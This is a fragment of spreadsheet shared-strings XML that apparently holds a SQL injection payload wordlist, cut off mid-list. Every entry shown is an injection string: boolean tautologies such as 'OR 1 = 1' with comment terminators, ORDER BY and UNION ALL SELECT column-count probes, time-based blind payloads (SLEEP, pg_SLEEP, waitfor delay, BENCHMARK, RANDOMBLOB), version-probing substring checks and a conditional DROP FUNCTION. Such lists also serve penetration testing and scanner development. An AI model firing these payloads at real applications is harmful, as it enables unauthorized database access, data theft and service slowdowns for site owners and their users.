  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> OR 1 = 1</t>
  </si>
  <si>
    <t xml:space="preserve"> OR 1 = 0</t>
  </si>
  <si>
    <t xml:space="preserve"> OR x = x</t>
  </si>
  <si>
    <t xml:space="preserve"> OR x = y</t>
  </si>
  <si>
    <t xml:space="preserve"> OR 1 = 1#</t>
  </si>
  <si>
    <t xml:space="preserve"> OR 1 = 0#</t>
  </si>
  <si>
    <t xml:space="preserve"> OR x = x#</t>
  </si>
  <si>
    <t xml:space="preserve"> OR x = y#</t>
  </si>
  <si>
    <t xml:space="preserve"> OR 1 = 1-- </t>
  </si>
  <si>
    <t xml:space="preserve"> OR 1 = 0-- </t>
  </si>
  <si>
    <t xml:space="preserve"> OR x = x-- </t>
  </si>
  <si>
    <t xml:space="preserve"> OR x = y-- </t>
  </si>
  <si>
    <t xml:space="preserve"> OR 3409 = 3409 AND  ( 'pytW' LIKE 'pytW</t>
  </si>
  <si>
    <t xml:space="preserve"> OR 3409 = 3409 AND  ( 'pytW' LIKE 'pytY</t>
  </si>
  <si>
    <t xml:space="preserve"> HAVING 1 = 1</t>
  </si>
  <si>
    <t xml:space="preserve"> HAVING 1 = 0</t>
  </si>
  <si>
    <t xml:space="preserve"> HAVING 1 = 1#</t>
  </si>
  <si>
    <t xml:space="preserve"> HAVING 1 = 0#</t>
  </si>
  <si>
    <t xml:space="preserve"> HAVING 1 = 1-- </t>
  </si>
  <si>
    <t xml:space="preserve"> HAVING 1 = 0-- </t>
  </si>
  <si>
    <t xml:space="preserve"> AND 1 = 1</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 1 = 0</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 1 = 1-- </t>
  </si>
  <si>
    <t xml:space="preserve"> AND 1 = 0-- </t>
  </si>
  <si>
    <t xml:space="preserve"> AND 1 = 1#</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 1 = 0#</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 1 = 1 AND '%' = '</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 1 = 0 AND '%' = '</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 1083 = 1083 AND  ( 1427 = 1427</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 7506 = 9091 AND  ( 5913 = 5913</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 1083 = 1083 AND  ( '1427 = 1427</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 7506 = 9091 AND  ( '5913 = 5913</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 7300 = 7300 AND 'pKlZ' = 'pKlZ</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 7300 = 7300 AND 'pKlZ' = 'pKlY</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 7300 = 7300 AND  ( 'pKlZ' = 'pKlZ</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 7300 = 7300 AND  ( 'pKlZ' = 'pKlY</t>
  </si>
  <si>
    <t xml:space="preserve"> AS INJECTX WHERE 1 = 1 AND 1 = 1</t>
  </si>
  <si>
    <t xml:space="preserve"> AS INJECTX WHERE 1 = 1 AND 1 = 0</t>
  </si>
  <si>
    <t xml:space="preserve"> AS INJECTX WHERE 1 = 1 AND 1 = 1#</t>
  </si>
  <si>
    <t xml:space="preserve"> AS INJECTX WHERE 1 = 1 AND 1 = 0#</t>
  </si>
  <si>
    <t xml:space="preserve"> AS INJECTX WHERE 1 = 1 AND 1 = 1--</t>
  </si>
  <si>
    <t xml:space="preserve"> AS INJECTX WHERE 1 = 1 AND 1 = 0--</t>
  </si>
  <si>
    <t xml:space="preserve"> WHERE 1 = 1 AND 1 = 1</t>
  </si>
  <si>
    <t xml:space="preserve"> WHERE 1 = 1 AND 1 = 0</t>
  </si>
  <si>
    <t xml:space="preserve"> WHERE 1 = 1 AND 1 = 1#</t>
  </si>
  <si>
    <t xml:space="preserve"> WHERE 1 = 1 AND 1 = 0#</t>
  </si>
  <si>
    <t xml:space="preserve"> WHERE 1 = 1 AND 1 = 1--</t>
  </si>
  <si>
    <t xml:space="preserve"> WHERE 1 = 1 AND 1 = 0--</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 31337-- </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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 31337#</t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 2 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 3 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 4 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 5 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 6 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 7 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 8 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 9 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 10 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 11 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 12 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 13 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 14 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 15 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 16 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 17 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 18 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 19 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 20 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 21 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 22 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 23 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 24 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 25 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 26 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 27 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 28 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 29 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 30 </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 31337 </t>
  </si>
  <si>
    <t xml:space="preserve"> RLIKE  ( SELECT  ( CASE WHEN  ( 4346 = 4346 )  THEN 0x61646d696e ELSE 0x28 END  )  )   AND 'Txws' = '</t>
  </si>
  <si>
    <t xml:space="preserve"> RLIKE  ( SELECT  ( CASE WHEN  ( 4346 = 4347 )  THEN 0x61646d696e ELSE 0x28 END  )  )   AND 'Txws' = '</t>
  </si>
  <si>
    <t>IF ( 7423 = 7424 )  SELECT 7423 ELSE DROP FUNCTION xcjl--</t>
  </si>
  <si>
    <t>IF ( 7423 = 7423 )  SELECT 7423 ELSE DROP FUNCTION xcjl--</t>
  </si>
  <si>
    <t>%' AND 8310 = 8310 AND '%' = '</t>
  </si>
  <si>
    <t>%' AND 8310 = 8311 AND '%' = '</t>
  </si>
  <si>
    <t xml:space="preserve"> and  ( select substring ( @@version,1,1  )  )   = 'X'</t>
  </si>
  <si>
    <t xml:space="preserve"> and  ( select substring ( @@version,1,1  )  )   = 'M'</t>
  </si>
  <si>
    <t xml:space="preserve"> and  ( select substring ( @@version,2,1  )  )   = 'i'</t>
  </si>
  <si>
    <t xml:space="preserve"> and  ( select substring ( @@version,2,1  )  )   = 'y'</t>
  </si>
  <si>
    <t xml:space="preserve"> and  ( select substring ( @@version,3,1  )  )   = 'c'</t>
  </si>
  <si>
    <t xml:space="preserve"> and  ( select substring ( @@version,3,1  )  )   = 'S'</t>
  </si>
  <si>
    <t xml:space="preserve"> and  ( select substring ( @@version,3,1  )  )   = 'X'</t>
  </si>
  <si>
    <t xml:space="preserve"> AND  ( SELECT * FROM  ( SELECT ( SLEEP ( 5  )  )   ) bAKL )  AND 'vRxe' = 'vRxe</t>
  </si>
  <si>
    <t xml:space="preserve"> AND  ( SELECT * FROM  ( SELECT ( SLEEP ( 5  )  )   ) YjoC )  AND '%' = '</t>
  </si>
  <si>
    <t xml:space="preserve"> AND  ( SELECT * FROM  ( SELECT ( SLEEP ( 5  )  )   ) nQIP ) </t>
  </si>
  <si>
    <t xml:space="preserve"> AND  ( SELECT * FROM  ( SELECT ( SLEEP ( 5  )  )   ) nQIP ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> AND  ( SELECT * FROM  ( SELECT ( SLEEP ( 5  )  )   ) nQIP ) #</t>
  </si>
  <si>
    <t>SLEEP ( 5 ) #</t>
  </si>
  <si>
    <t xml:space="preserve">SLEEP ( 5 ) -- </t>
  </si>
  <si>
    <t>SLEEP ( 5 )  = "</t>
  </si>
  <si>
    <t>SLEEP ( 5 )  = '</t>
  </si>
  <si>
    <t xml:space="preserve"> or SLEEP ( 5 ) </t>
  </si>
  <si>
    <t xml:space="preserve"> or SLEEP ( 5 ) #</t>
  </si>
  <si>
    <t xml:space="preserve"> or SLEEP ( 5 ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> or SLEEP ( 5 )  = "</t>
  </si>
  <si>
    <t xml:space="preserve"> or SLEEP ( 5 )  = '</t>
  </si>
  <si>
    <t>waitfor delay '00:00:05'</t>
  </si>
  <si>
    <t xml:space="preserve">waitfor delay '00:00:05'-- </t>
  </si>
  <si>
    <t>waitfor delay '00:00:05'#</t>
  </si>
  <si>
    <t xml:space="preserve">benchmark ( 50000000,MD5 ( 1  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">benchmark ( 50000000,MD5 ( 1  )  )  -- </t>
  </si>
  <si>
    <t>benchmark ( 50000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t xml:space="preserve"> or benchmark ( 50000000,MD5 ( 1  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> or benchmark ( 50000000,MD5 ( 1  )  )  -- </t>
  </si>
  <si>
    <t xml:space="preserve"> or benchmark ( 50000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t xml:space="preserve">pg_SLEEP ( 5 ) </t>
  </si>
  <si>
    <t xml:space="preserve">pg_SLEEP ( 5 ) -- </t>
  </si>
  <si>
    <t>pg_SLEEP ( 5 ) #</t>
  </si>
  <si>
    <t xml:space="preserve"> or pg_SLEEP ( 5 ) </t>
  </si>
  <si>
    <t xml:space="preserve"> or pg_SLEEP ( 5 ) -- </t>
  </si>
  <si>
    <t xml:space="preserve"> or pg_SLEEP ( 5 ) #</t>
  </si>
  <si>
    <t xml:space="preserve"> + SLEEP ( 10 )  + '</t>
  </si>
  <si>
    <t xml:space="preserve"> RANDOMBLOB ( 500000000/2 ) </t>
  </si>
  <si>
    <t xml:space="preserve"> AND 2947 = LIKE ( 'ABCDEFG',UPPER ( HEX ( RANDOMBLOB ( 500000000/2  )  )    )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> OR 2947 = LIKE ( 'ABCDEFG',UPPER ( HEX ( RANDOMBLOB ( 500000000/2  )  )    )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> RANDOMBLOB ( 1000000000/2 ) </t>
  </si>
  <si>
    <t xml:space="preserve"> AND 2947 = LIKE ( 'ABCDEFG',UPPER ( HEX ( RANDOMBLOB ( 1000000000/2  )  )    )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> OR 2947 = LIKE ( 'ABCDEFG',UPPER ( HEX ( RANDOMBLOB ( 1000000000/2  )  )    )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> SLEEP ( 1 ) /*' or SLEEP ( 1 )  or '" or SLEEP ( 1 )  or "*/</t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY SLEEP ( 5 ) </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4</t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5</t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6</t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7</t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8</t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9</t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10</t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11</t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12</t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13</t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13,14</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30</t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY SLEEP ( 5 ) #</t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) #</t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,3#</t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,3,4#</t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5#</t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6#</t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7#</t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8#</t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9#</t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10#</t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11#</t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12#</t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13#</t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13,14#</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#</t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY SLEEP ( 5 ) -- </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) -- </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,3-- </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,3,4-- </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5-- </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6-- </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7-- </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8-- </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9-- </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10-- </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11-- </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12-- </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13-- </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13,14-- </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13,14,15-- </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13,14,15,16-- </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- </t>
  </si>
  <si>
    <t xml:space="preserve"> ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10#</t>
  </si>
  <si>
